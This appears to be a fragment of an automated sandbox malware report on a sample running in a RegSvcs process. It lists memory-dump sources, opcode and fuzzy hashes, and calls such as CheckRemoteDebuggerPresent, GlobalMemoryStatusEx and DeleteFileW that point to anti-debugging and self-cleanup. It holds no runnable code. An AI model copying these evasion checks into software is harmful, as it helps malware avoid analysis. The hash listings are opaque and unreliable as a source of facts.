                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae7392d8d99a195d6a16ba222c9a5cb57ce992e27c70b683fc66efe23192802d
                                                                        • Instruction ID: 64c9b5b099d6cfad01eca1c5f59763f36b29a319c96b51ab8f7c57a1124ff02a
                                                                        • Opcode Fuzzy Hash: ae7392d8d99a195d6a16ba222c9a5cb57ce992e27c70b683fc66efe23192802d
                                                                        • Instruction Fuzzy Hash: 28E0D871E0534DABDF20CA70CD0571EBBB8DB01209F614997DD04CB191F576D9059791
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d38ceaad84733d6cc49a98ac3c15ff06e118c29c7edc05b4e944043846388821
                                                                        • Instruction ID: 9dc268bdd1aca5a635abff21c4e3b19fd92bcd22d07bc30027eabc18745af0f9
                                                                        • Opcode Fuzzy Hash: d38ceaad84733d6cc49a98ac3c15ff06e118c29c7edc05b4e944043846388821
                                                                        • Instruction Fuzzy Hash: B323F931D10B198ECB11EF68C8946A9F7B1FF99300F55D79AE458B7221EB70AAC4CB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05e26235335712a2e2be700fbcd949f8320e1aff6f86aea33db25757bf3d2346
                                                                        • Instruction ID: eea91f2cae734c191366b93707c16c67c29c329164ce9278e9edce471a357923
                                                                        • Opcode Fuzzy Hash: 05e26235335712a2e2be700fbcd949f8320e1aff6f86aea33db25757bf3d2346
                                                                        • Instruction Fuzzy Hash: 3622BE30B102058FDB54DB68D484BADB7F2FF88314F259569D90ADB3A1DB35ED428B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8700fe36ece5fe0f3bac896c63faa668645d5243ebfb2ad8e88a1bc3ea7463b1
                                                                        • Instruction ID: 42547d7796bef8d4ddc7c0fc420852ff4817011ef7336e0c87c1baa0fadfc060
                                                                        • Opcode Fuzzy Hash: 8700fe36ece5fe0f3bac896c63faa668645d5243ebfb2ad8e88a1bc3ea7463b1
                                                                        • Instruction Fuzzy Hash: C1122A30E01219CFEF64DF65C854A9EB7B2BF88304F2195A9D90AAB355DB309D85CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d81c55d4a416eb29bcea63eeb5d1ac5669dd0f665371ca2e754e27e5cd25bb5a
                                                                        • Instruction ID: 55367c64875b2c1c566170d4da50430d8096d06a87ff3a540bdaee0bd97966fc
                                                                        • Opcode Fuzzy Hash: d81c55d4a416eb29bcea63eeb5d1ac5669dd0f665371ca2e754e27e5cd25bb5a
                                                                        • Instruction Fuzzy Hash: 97B13B71E00219CFEB14CFA9DC897ADBBF2AF88714F148129D815AB354EB749845CF91

                                                                        Execution Graph

                                                                        Execution Coverage: 13.8%
                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 53
                                                                        Total number of Limit Nodes: 4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 23e743c720495a78ce721559b3fedac878ecec448062cf8bf7db93ff8053581e
                                                                        • Instruction ID: c141df1c88502fedca97d217c94f46c0a967d81237d1e68a819a28d9c6e68242
                                                                        • Opcode Fuzzy Hash: 23e743c720495a78ce721559b3fedac878ecec448062cf8bf7db93ff8053581e
                                                                        • Instruction Fuzzy Hash: 3322B075E002258FDF64DFA4C9806AEB7B2EF89310F24856AD406EB355DB31ED46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0c0cad7c6b671626fa909bc7796bec74f49ceee9163970611d358b47d53a57e
                                                                        • Instruction ID: dc1e8e148f67a8d99fa20fece94823dba9ffbbb1b80607d286018289b010170b
                                                                        • Opcode Fuzzy Hash: a0c0cad7c6b671626fa909bc7796bec74f49ceee9163970611d358b47d53a57e
                                                                        • Instruction Fuzzy Hash: 66D27A34E00219CFDB64DF68C494AADB7B2FF85310F5485AAD449AB365EB31ED85CB80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e63744fbbb11758abbe91725043395ed8cd84e034afbbcfac20bf0008c4a4ef
                                                                        • Instruction ID: a8cd5b456199a34c08e9600422746c7665801aadc57ae680feab37e55ae03e01
                                                                        • Opcode Fuzzy Hash: 8e63744fbbb11758abbe91725043395ed8cd84e034afbbcfac20bf0008c4a4ef
                                                                        • Instruction Fuzzy Hash: 0262BF34B00225AFDB54DB68D594BADB7F2EF88310F248469E806DB395DB31ED46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef5ae43e534a7fc9afb1f0053bf1b11b39c0ef54862c0ffbf6a345c21b53a07f
                                                                        • Instruction ID: 48394e39a675fb6c1a2cdbf10b6d80fc2ebb9e932aac76380bc17be59ff5e92e
                                                                        • Opcode Fuzzy Hash: ef5ae43e534a7fc9afb1f0053bf1b11b39c0ef54862c0ffbf6a345c21b53a07f
                                                                        • Instruction Fuzzy Hash: 7C527E34E002298FEF64DF68D8907ADB7F2EB95310F24856AE405EB395DA34DC85CB91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 216cd99a2148dfa1d39acaab1c48ef8915df70c4263feb035c2ef0d2eb6d7861
                                                                        • Instruction ID: 0e5a37a91e90e457b0adba91c178d7dd9dd1794815b9a0d27d46335e60f9a7a7
                                                                        • Opcode Fuzzy Hash: 216cd99a2148dfa1d39acaab1c48ef8915df70c4263feb035c2ef0d2eb6d7861
                                                                        • Instruction Fuzzy Hash: AB329134B002199FEF54DB68D884BAEB7B2FB88310F108569E515EB395DB75EC42CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5400d8842c9da09c2b399f42f40ad99fb893e6a6400defed66588f27258ce5d8
                                                                        • Instruction ID: 170f5f49fcb85af72c77516fc07f64be4d55815ff5655b2d212246f5cf66fe10
                                                                        • Opcode Fuzzy Hash: 5400d8842c9da09c2b399f42f40ad99fb893e6a6400defed66588f27258ce5d8
                                                                        • Instruction Fuzzy Hash: FE029F74B0021A8FDB54DF78D894AAEBBF2EF84310F248569D4069B395DB31ED42CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 697 def79d-def7b9 700 def7bf-def84c GlobalMemoryStatusEx 697->700 701 def7bb-def7be 697->701 704 def84e-def854 700->704 705 def855-def87d 700->705 704->705
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00DEF83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: bb559aac3a38d4dc2bf59ba350764ca85bdc71a675560fd50556e83127a235a5
                                                                        • Instruction ID: 8f476a1d9ee1542aeb4d6fea448939b58d5b37d50268219bb4a855fb728c0f99
                                                                        • Opcode Fuzzy Hash: bb559aac3a38d4dc2bf59ba350764ca85bdc71a675560fd50556e83127a235a5
                                                                        • Instruction Fuzzy Hash: 3121A7B1C0025A9FDB10DFAAC4447EEBBF4EF48320F14852AD948A7340D338A841CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 708 de7fd8-de805c CheckRemoteDebuggerPresent 710 de805e-de8064 708->710 711 de8065-de80a0 708->711 710->711
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00DE804F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: dfc98dedfc34b641c684c045ff6c0a437ec9b55fdd11058d73bd4a7e6370f1c4
                                                                        • Instruction ID: 83eeed89c7e17bac9e35775b6664345f6d113ce157b51af9fed1a94380610568
                                                                        • Opcode Fuzzy Hash: dfc98dedfc34b641c684c045ff6c0a437ec9b55fdd11058d73bd4a7e6370f1c4
                                                                        • Instruction Fuzzy Hash: 0A2157B1800259CFDB10CF9AC884BEEFBF4AF48320F14841AE859A3350D778A944CF60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 714 de7fd7-de805c CheckRemoteDebuggerPresent 716 de805e-de8064 714->716 717 de8065-de80a0 714->717 716->717
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00DE804F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: f9aac19b71c00e7a34be6f7099e129e3c34f583b4debdf809e0ba3154ee1f32d
                                                                        • Instruction ID: 01535f1e721235e447802ad9c1e13da4e158e8c748b49bd59133dda90a1480e9
                                                                        • Opcode Fuzzy Hash: f9aac19b71c00e7a34be6f7099e129e3c34f583b4debdf809e0ba3154ee1f32d
                                                                        • Instruction Fuzzy Hash: D62137B2800259CFDB10CF9AD5847EEBBF4AF48310F14845AE459B7351D778A944DF60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 720 de7aa0-de8f9a 723 de8f9c-de8f9f 720->723 724 de8fa2-de8fcd DeleteFileW 720->724 723->724 725 de8fcf-de8fd5 724->725 726 de8fd6-de8ffe 724->726 725->726
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00DE8FC0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 3d42b06ffe85b6640484dd4e803ac53c5fc9ef42c7686845ffc121c17b09b7e2
                                                                        • Instruction ID: c20c7a5a3012257eb2663d95c04cec84fbc5056dd06cfc03760599cfdefaecb2
                                                                        • Opcode Fuzzy Hash: 3d42b06ffe85b6640484dd4e803ac53c5fc9ef42c7686845ffc121c17b09b7e2
                                                                        • Instruction Fuzzy Hash: BA2133B1C0465A9BDB10DF9AC4447AEFBB4EF88320F14816AE918B7240D738A940CFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 729 de8f4f-de8f9a 731 de8f9c-de8f9f 729->731 732 de8fa2-de8fcd DeleteFileW 729->732 731->732 733 de8fcf-de8fd5 732->733 734 de8fd6-de8ffe 732->734 733->734
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00DE8FC0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00DEF83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a
                                                                        • API String ID: 0-3904355907

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5dc04b4b2f6b576c7fff49c82f0452f9551e9cfcfae15e7c8033d261540519af
                                                                        • Instruction ID: 6ba96b7824a3e206fb3d33216cca502f81591b159342f94353197717b341d102
                                                                        • Opcode Fuzzy Hash: 5dc04b4b2f6b576c7fff49c82f0452f9551e9cfcfae15e7c8033d261540519af
                                                                        • Instruction Fuzzy Hash: F6715231E1031A8FDB14DFA5C4546AEB7F2FF88300F10866AD405AB355EBB1E986CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4afe1c0aff7a990a5425af5beb5d391f4fa9fccd6bc9b9c1e4e775c50a5838e8
                                                                        • Instruction ID: 3ebd0fd8e9fae53fb04c48efb491a708b188c05313c7fd77ba168de26aa37ebe
                                                                        • Opcode Fuzzy Hash: 4afe1c0aff7a990a5425af5beb5d391f4fa9fccd6bc9b9c1e4e775c50a5838e8
                                                                        • Instruction Fuzzy Hash: EB717270E102198FDF54DBA8D880BADB7B6EF89310F208526E405EB395DB75DC81CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52477962bc4ec0178a266d9693655481d64b43380b6a3f8063d181e3f3ab756c
                                                                        • Instruction ID: b92da91f0a66a80ba5a5576a7f596bfeb111fc571b0a69479ad2890be214978d
                                                                        • Opcode Fuzzy Hash: 52477962bc4ec0178a266d9693655481d64b43380b6a3f8063d181e3f3ab756c
                                                                        • Instruction Fuzzy Hash: FE617130F002199FDF549FA4C855BAEBBF6EB88700F20842AE105EB395DF758C458B90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee2842b35c8a37ec48e537115e0bfbc5f148f9707829f53e7bc5b268f5c468ce
                                                                        • Instruction ID: ce46b14311f3fa0a8563eaa0b0ffb6c12712ecac7eeec13804af5c1e0b613082
                                                                        • Opcode Fuzzy Hash: ee2842b35c8a37ec48e537115e0bfbc5f148f9707829f53e7bc5b268f5c468ce
                                                                        • Instruction Fuzzy Hash: C451D131E00219DFDF14AB78E8487ADB7B2FF88315F20886AE506D7361DB358955CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2461f1c38bea6f14943bcb693bf149ae0bf9137f6fc1fe843168d5b64f08f8e
                                                                        • Instruction ID: 6d6690b8f5fb5c2287d34ab42a095ed97be148d2d92676ce1e08b075ea5c33b0
                                                                        • Opcode Fuzzy Hash: d2461f1c38bea6f14943bcb693bf149ae0bf9137f6fc1fe843168d5b64f08f8e
                                                                        • Instruction Fuzzy Hash: C051C534F202659FEF64666CD89477F3A6ED789310F20443AE50AD73A6CA7CDC4183A2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c83670952b76183a0223d674689c302ec19a08dc4189461f6384b0b0effb7db0
                                                                        • Instruction ID: 31eed8c1a69288b5fcdf00affed0c215d1eb00ad6fe1e48aa1f879e933e58048
                                                                        • Opcode Fuzzy Hash: c83670952b76183a0223d674689c302ec19a08dc4189461f6384b0b0effb7db0
                                                                        • Instruction Fuzzy Hash: 9451D434F101259FEF64666CE89477F366ED789310F20042AE10AD73A5CA7CDC8187A2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dd52ad363bbabbe85f646c375ad5a55f8389d3a324b73d2be3825d440b7a442
                                                                        • Instruction ID: 9dadc8c44530f19d344f85eb025dc22a765162a0f85f7bc6cd0bc48104d3844c
                                                                        • Opcode Fuzzy Hash: 1dd52ad363bbabbe85f646c375ad5a55f8389d3a324b73d2be3825d440b7a442
                                                                        • Instruction Fuzzy Hash: 94516E35B051568FDB94DB74D990BAEB3F6AF88340F10856AC80AEB344EB70DC128F91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f4b51d288f7b639a6d37fe47a9309fc8d098912639b75f31b07ebe5bab57ad4
                                                                        • Instruction ID: f872dbd205921d342b3a628f52c77623fdbe6e8730a5f952736334f639f8d43d
                                                                        • Opcode Fuzzy Hash: 6f4b51d288f7b639a6d37fe47a9309fc8d098912639b75f31b07ebe5bab57ad4
                                                                        • Instruction Fuzzy Hash: D2418274E002158FDF64CEA9C980BBEB7B2FB85310F24892AE557DB391C635D981CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5eb680eeaeef78af50618dd5cae8fbd6ad80631678bbb97cbb80de2c7d57e5d4
                                                                        • Instruction ID: 3b25f0e26037a668fe43f69f81c847839a6565c2adf74456c31191c48e4c74b8
                                                                        • Opcode Fuzzy Hash: 5eb680eeaeef78af50618dd5cae8fbd6ad80631678bbb97cbb80de2c7d57e5d4
                                                                        • Instruction Fuzzy Hash: 7A417275F102089FDB559FA4C845BAEBBF6FF88710F20852AE105AB399DE718C458B90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de5f3e38f688f8a2d13efbb3f52de81f1790f16b6714fa587e382593748cb2e2
                                                                        • Instruction ID: 327db7efb723a071e593a16497a7af1225fad477e30b2c9aebee29adf13fc488
                                                                        • Opcode Fuzzy Hash: de5f3e38f688f8a2d13efbb3f52de81f1790f16b6714fa587e382593748cb2e2
                                                                        • Instruction Fuzzy Hash: 92416C71E006198BDF70CEA9D8C1AAFFBF2EB84314F10492AE256D7654D731E9458BD0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1765109e14bcc86a290b4f79247aa1eef70ef461610f8013df087a6388bf0771
                                                                        • Instruction ID: 48e347a4c86f6fc224ccfc89cbe1aebc58a66cadab278cac488e53bec18dcd6f
                                                                        • Opcode Fuzzy Hash: 1765109e14bcc86a290b4f79247aa1eef70ef461610f8013df087a6388bf0771
                                                                        • Instruction Fuzzy Hash: DF41B270E1022A9FDB55DF75C984A9EBBB2FF85340F14452AE406DB340DB70E946CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 931498bd71d9d7f3bccbc20e4607bf3df880a82f57475fb29403ca7d43eaefba
                                                                        • Instruction ID: c42af5a109fcb6bb17fccf99af35a95710dc38077952076ff56195684810c3b7
                                                                        • Opcode Fuzzy Hash: 931498bd71d9d7f3bccbc20e4607bf3df880a82f57475fb29403ca7d43eaefba
                                                                        • Instruction Fuzzy Hash: 23417E70E1062ADFDB65DFA5C9847AEBBB6BF85340F20452AD406EB340DB70D946CB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a41aa8842180e08532bba1816b2350ae170dd40b5255f81f2b01a0119bbf7c4
                                                                        • Instruction ID: e5e5f43fbbc52be2871eb84200bbb84f778dbbbeeefb1767fe36ba0603939463
                                                                        • Opcode Fuzzy Hash: 4a41aa8842180e08532bba1816b2350ae170dd40b5255f81f2b01a0119bbf7c4
                                                                        • Instruction Fuzzy Hash: 7731F030B0021A8FDB19AB74D964B6F7BE7AF89600F204469D402DB380DF31CE82CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 121e6e24442c3713ad428b2e2ea479f48e4633ccab8aa8936eefad86c438e1a4
                                                                        • Instruction ID: d0eae2473905a208b397746bd30b53c10c882ac4669a9ea38193a3d723912147
                                                                        • Opcode Fuzzy Hash: 121e6e24442c3713ad428b2e2ea479f48e4633ccab8aa8936eefad86c438e1a4
                                                                        • Instruction Fuzzy Hash: 2631C130B102168FDB59AB74D964B7E77E7AF89600F244569D402DB385DF31CE86CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
